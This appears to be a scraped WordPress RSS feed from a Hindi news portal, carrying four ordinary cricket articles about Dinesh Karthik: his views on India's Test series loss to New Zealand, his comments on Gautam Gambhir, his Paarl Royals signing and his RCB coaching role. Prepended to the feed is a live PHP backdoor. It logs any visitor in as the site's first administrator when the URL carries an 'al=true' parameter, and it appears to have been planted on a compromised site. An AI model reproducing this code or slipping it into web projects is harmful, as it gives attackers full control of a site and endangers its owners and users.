// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Dinesh Karthik – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 27 Oct 2024 20:38:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 न्यूजीलैंड के खिलाफ टेस्ट श्रृंखला में हार की जिम्मेदारी सीनियर भारतीय खिलाड़ियों पर: दिनेश कार्तिक https://pratyushaashakinayikiran.com/?p=90659 Sun, 27 Oct 2024 20:38:00 +0000 https://pratyushaashakinayikiran.com/?p=90659 नई दिल्ली
भारत के पूर्व विकेटकीपर दिनेश कार्तिक का मानना ​​है कि न्यूजीलैंड के खिलाफ टेस्ट श्रृंखला में हार की जिम्मेदारी सीनियर भारतीय खिलाड़ियों पर है जबकि पूर्व बल्लेबाज संजय मांजरेकर का मानना ​​है कि कोच गौतम गंभीर पर दोष मढ़ना अनुचित होगा। भारत ने शनिवार को पुणे में न्यूजीलैंड के खिलाफ दूसरा टेस्ट 113 रन से गंवा दिया जिससे मेहमान टीम ने तीन मैच की श्रृंखला में 2-0 की विजयी बढ़त बना ली। इसके साथ ही भारत का 2012-13 में इंग्लैंड से हारने के बाद से घरेलू मैदान पर लगातार 18 टेस्ट श्रृंखला जीतने का सिलसिला भी खत्म हो गया।

दोनों मुकाबलों के दौरान सीनियर खिलाड़ियों ने अच्छा प्रदर्शन नहीं किया। रोहित शर्मा और विराट कोहली बल्ले से संघर्ष करते रहे जबकि रविचंद्रन अश्विन और रविंद्र जडेजा की स्पिन जोड़ी भी कोई खास प्रभाव नहीं छोड़ पाई। कार्तिक ने  कहा, ‘हां। इसका (श्रृंखला में हार का) दोष सीनियर खिलाड़ियों पर क्यों नहीं होना चाहिए? वे खुद को देखेंगे और कहेंगे, ‘हम और क्या बेहतर कर सकते थे?' मुझे नहीं लगता कि वे इससे भाग रहे हैं।'

उन्होंने कहा, ‘अगर आप जीत का जश्न मना सकते हैं और प्रशंसक यह महसूस करते हैं कि वे कितने महत्वपूर्ण हैं तो जब हार होती है और आप पर हमला किया जाता है तो मुझे लगता है कि उनमें इसका सामना करने की हिम्मत होनी चाहिए।' कार्तिक ने कहा कि सीनियर खिलाड़ी हार की जिम्मेदारी खुद लेंगे और स्वीकार करेंगे कि यह उनकी सर्वश्रेष्ठ श्रृंखला नहीं थी।

उन्होंने कहा, ‘अगर आप उनमें से हर एक से व्यक्तिगत रूप से पूछें कि वे श्रृंखला के बारे में क्या सोचते हैं तो मुझे नहीं लगता कि वे पूरी टीम के प्रदर्शन के बारे में कुछ खास कह पाएंगे और उनसे यह पूछना उचित होगा कि भारत में टेस्ट क्रिकेट के भविष्य और भारतीय टेस्ट क्रिकेट के लिए क्या बेहतर किया जा सकता है।' कार्तिक ने कहा, ‘मैं उनमें से प्रत्येक को व्यक्तिगत रूप से जानता हूं। वे कहेंगे कि उनके लिए यह सर्वश्रेष्ठ श्रृंखला नहीं थी। फिर सवाल यह उठता है कि उन्हें बेहतर होने के लिए क्या करने की जरूरत है और यह एक मौजूदा सवाल है।'

भारत के दो टेस्ट मैच में रणनीति में चूक करने और बार-बार बल्लेबाजी के ढहने के बाद नए मुख्य कोच गौतम गंभीर भी आलोचनाओं के घेरे में आ गए हैं लेकिन मांजरेकर ने इस पूर्व सलामी बल्लेबाज का समर्थन किया। मांजरेकर ने कहा, ‘मैं अब भी यही कहूंगा कि कोच का टीम पर सबसे कम प्रभाव होता है, आपके 11वें सबसे कमजोर खिलाड़ी से भी कम। वह मैदान पर पैर नहीं रखता, कप्तान वहां प्रभारी होता है।'

उन्होंने कहा, ‘लेकिन आपको वाशिंगटन सुंदर के चयन के लिए उनकी सराहना करनी होगी जो तुरंत हिट हो गया।' मांजरेकर ने फॉर्म में चल रहे सरफराज खान से पहले ऑलराउंडर सुंदर को बल्लेबाजी के लिए भेजने के रोहित के ‘अजीब' फैसले पर सवाल उठाया। उन्होंने कहा, ‘सरफराज खान को निचले क्रम में बल्लेबाजी के लिए भेजना और वाशिंगटन सुंदर को उनके ऊपर भेजना क्योंकि वह बाएं हाथ का बल्लेबाज है, इस तरह की चीजें नहीं होनी चाहिए।'

मांजरेकर ने कहा, ‘यह बिल्कुल अजीब है। यह एक ऐसी चीज है जिससे रोहित शर्मा को सावधान रहने की जरूरत है। टी20 में बाएं और दाएं हाथ के संयोजन के बारे में सोचना। मुझे लगता है कि उन्हें खिलाड़ियों की समग्र गुणवत्ता और क्षमता के आधार पर ही आगे बढ़ना चाहिए।'

जब भारत को अपने अनुभवी बल्लेबाजों की जरूरत थी तब रोहित (2, 52, 0, 8) चार पारियों में कुल 62 रन ही बना पाए जबकि कोहली (0,70, 1,17) ने 88 रन बनाए। घरेलू सर्किट में कोहली की अनुपस्थिति पर भारत के पूर्व कप्तान अनिल कुंबले ने कहा कि यह करिश्माई बल्लेबाज घरेलू मैचों के लिए खुद को उपलब्ध कराके लंबे टेस्ट कैलेंडर के लिए अच्छी तरह से तैयार हो सकता था।

कुंबले ने ‘जियो सिनेमा' से कहा, ‘शायद मैच की परिस्थितियों में सिर्फ एक या दो पारियां मददगार हो सकती थीं। वास्तविक मैच में शामिल होना निश्चित रूप से सिर्फ अभ्यास करने से ज्यादा फायदेमंद है, इससे फायदा मिलता है।' उन्होंने कहा, ‘अगर उन्हें लगता कि पहले खेलने से उन्हें फायदा होता और टीम प्रबंधन सहमत होता, तो शायद ऐसा होता।'

]]>
अपने खिलाड़ियों के बचाव में आक्रामक होते हैं गंभीर : दिनेश कार्तिक https://pratyushaashakinayikiran.com/?p=72088 Wed, 18 Sep 2024 15:40:00 +0000 https://pratyushaashakinayikiran.com/?p=72088 चेन्नई
भारत के पूर्व विकेटकीपर बल्लेबाज दिनेश कार्तिक ने कहा कि मुख्य कोच गौतम गंभीर अतीत में अपने खिलाड़ियों के बचाव के लिये ही आक्रामक होते नजर आये हैं। कार्तिक ने कहा कि गंभीर की आक्रामकता कभी भी गैर जरूरी नहीं थी। उन्होंने यहां लीजैंड्स लीग क्रिकेट के एक कार्यक्रम से इतर कहा, ‘‘वह अपने खिलाड़ियों के बचाव के लिये ही आक्रामक होता रहा है। मौजूदा दौर के खिलाड़ी इसका आनंद उठायेंगे।वह बिना वजह क्रोधित नहीं होता।’’

कार्तिक ने कहा, ‘‘मुझे यकीन है कि जब भी जरूरत होगी, वह सख्ती से पेश आयेगा। ऐसा खिलाड़ियों से सर्वश्रेष्ठ प्रदर्शन कराने के लिये ही होगा।’’ उन्होंने यह भी कहा कि बांग्लादेश के खिलाफ बृहस्पतिवार से शुरू हो रही टेस्ट श्रृंखला से पहले टेस्ट क्रिकेट में कोचिंग का अनुभव नहीं होना गंभीर के जेहन में होगा।

उन्होंने कहा, ‘‘उसने कई टी20 टूर्नामेंटों में कोचिंग की है लेकिन बतौर कोच यह टेस्ट श्रृंखला उसके लिये नई होगी और यह उसके जेहन में जरूर होगा। वह खेल की नब्ज समझता है जो एक कोच के लिये सबसे महत्वपूर्ण है।’’

 

]]>
दिनेश कार्तिक का अनोखा कीर्तिमान, इस T20 लीग से जुड़ने वाले पहले भारतीय क्रिकेटर बने https://pratyushaashakinayikiran.com/?p=57903 Tue, 06 Aug 2024 18:36:00 +0000 https://pratyushaashakinayikiran.com/?p=57903 मुंबई

पूर्व विकेटकीपर बल्लेबाज दिनेश कार्तिक को पार्ल रॉयल्स ने एसए20 के तीसरे सत्र के लिए अनुबंधित किया, जिससे वह अगले साल 9 जनवरी से शुरू होने वाली दक्षिण अफ्रीकी टी20 क्रिकेट लीग से जुड़ने वाले पहले भारतीय क्रिकेटर बन गए.

आईपीएल में लंबे समय तक खेलने वाले 39 साल के कार्तिक ने इस साल जून में क्रिकेट के सभी प्रारूपों से संन्यास ले लिया था और उन्हें आईपीएल टीम रॉयल चैलेंजर्स बेंगलुरू ने मेंटर (मार्गदर्शक) सह बल्लेबाजी कोच के रूप में नियुक्त किया है.

भारत के लिए तीनों प्रारूपों में 180 मैच खेलने वाले कार्तिक ने कहा, ‘दक्षिण अफ्रीका में खेलने और वहां जाने की मेरी बहुत सारी यादें हैं और जब यह अवसर आया तो मैं मना नहीं कर सका क्योंकि प्रतिस्पर्धी क्रिकेट में वापस आना और रॉयल्स के साथ इस अविश्वसनीय प्रतियोगिता को जीतना कितना खास होगा.’

कार्तिक ने पिछला प्रतिस्पर्धी टी20 मैच आईपीएल 2024 में रॉयल चैलेंजर्स बेंगलुरू के लिए खेला था. उन्होंने 2024 सत्र में 14 मैच में 187.36 के स्ट्राइक रेट से 326 रन बनाए थे. कार्तिक ने भारत के लिए आखिरी मैच 2022 में ऑस्ट्रेलिया में हुए टी20 विश्व कप के दौरान बांग्लादेश के खिलाफ खेला था.

एक दिन पहले लीग के दूत बनाए गए कार्तिक ने कहा, ‘मैं पार्ल रॉयल्स टीम में शामिल होकर बहुत खुश हूं जिस टीम में काफी अनुभव, गुणवत्ता और क्षमता है. मैं निश्चित रूप से इस समूह में शामिल होने और एक रोमांचक सत्र में योगदान देने के लिए उत्सुक हूं.’

 

]]>
दिनेश कार्तिक बने आरसीबी के बैटिंग कोच और मेंटर, फ्रेंचाइजी ने किया बड़ा एलान https://pratyushaashakinayikiran.com/?p=47064 Mon, 01 Jul 2024 15:56:00 +0000 https://pratyushaashakinayikiran.com/?p=47064 मुंबई

भारतीय टीम के पूर्व विकेटकीपर बैटर दिनेश कार्तिक (Dinesh Karthik) को रॉयल चैलेंजर्स बैंगलुरु (RCB) ने अपनी टीम का बैटिंग कोच और मेंटर के लिए नियुक्त किया है। फ्रेंचाइजी ने इसकी घोषणा सोमवार को सोशल मीडिया पर एक पोस्ट शेयर कर की।

दिनेश कार्तिक ने पिछले सीजन में आईपीएल से संन्यास ले लिया था, लेकिन अब कार्तिक नई भूमिका में नजर आएंगे। कार्तिक आरसीबी के साथ-साथ आईपीएल में और भी टीमों के लिए खेल चुके हैं।

Dinesh Karthik बने RCB के बैटिंग कोच और मेंटर

दरअसल आरसीबी ने एक्स (पूर्व में ट्विटर) पर एक पोस्ट शेयर कर एक बड़ी जानकार दी। आरसीबी ने बताया कि दिनेश कार्तिक को उन्होंने टीम के मेंटर और बैटिंग कोच की जिम्मेदारी सौंपी गई है। आरसीबी ने लिखा कि कार्तिक आरसीबी में नए अवतार के साथ वापसी कर रहे हैं।  दिनेश कार्तिक आरसीबी मेंस टीम के बैटिंग कोच और मेंटर होंगे। आप किसी को क्रिकेट से बाहर कर सकते हैं, लेकिन उसके अंदर से क्रिकेट को बाहर नहीं कर सकती है।

बता दें कि आईपीएल 2024 में आरसीबी टीम के हेड कोच एंडी फ्लावर, बैटिंग कोच श्रीधरन श्रीराम, बॉलिंग कोच एडम ग्रिफिथ और फील्डिंग कोच मालोलन रंगराजन थे। अब आईपीएल 2025 में आरसीबी की टीम के मेंटर और बैटिंग कोच की जिम्मेदारी दिनेश कार्तिक निभाते हुए नजर आएँगे।

इससे पहले कार्तिक ने अपने 39वें जन्मदिन पर आईपीएल से संन्यास को लेकर ऑफिशियल जानकारी दी थी। उन्होंने एक्स पर अपने संन्यास का एलान करते हुए लिखा था कि पिछले कुछ दिनों में मुझे जो प्यार, समर्थन मिला, उससे मैं अभिभूत हूं। इस चीज को संभव बनाने वाले सभी प्रशसंकों के प्रति मेरी गहरी कृतज्ञता और हार्दिक धन्यवाद। काफी समय तक इस पर विचार करने के बाद मैंने क्रिकेट से हटने का फैसला लिया। मैं अधिकारिक तौर पर अपने संन्यास की घोषणा करता हूं। अपने खेल के दिनों को पीछे छोड़कर आगे आने वाली नई चुनौतियों के लिए मैं तैयार हूं।

RCB का आईपीएल खिताब जीतने का इंतजार बरकरार आरसीबी की टीम का आईपीएल 2024 में प्रदर्शन कुछ खास नहीं रही। आरसीबी ने लगातार 6 मैचों में हार का सामना किया। हालांकि, इसके बाद उन्होंने शानदार वापसी जरूर की, लेकिन अपने लीग स्टेज के आखिरी मैच में सीएसके से उन्हें सामना करना पड़ा। एलिमिनेटर मैच में राजस्थान रॉयल्स के खिलाफ आरसीबी को हार झेलनी पड़ी। अगर बात करें कार्तिक के करियर की तो उन्होंने साल 2008 में आईपीएल में डेब्यू किया था और उन्होंने कुल 257 मैच खेलते हुए 4842 रन बनाए। इस दौरान उनका औसत 26 का रहा।

]]>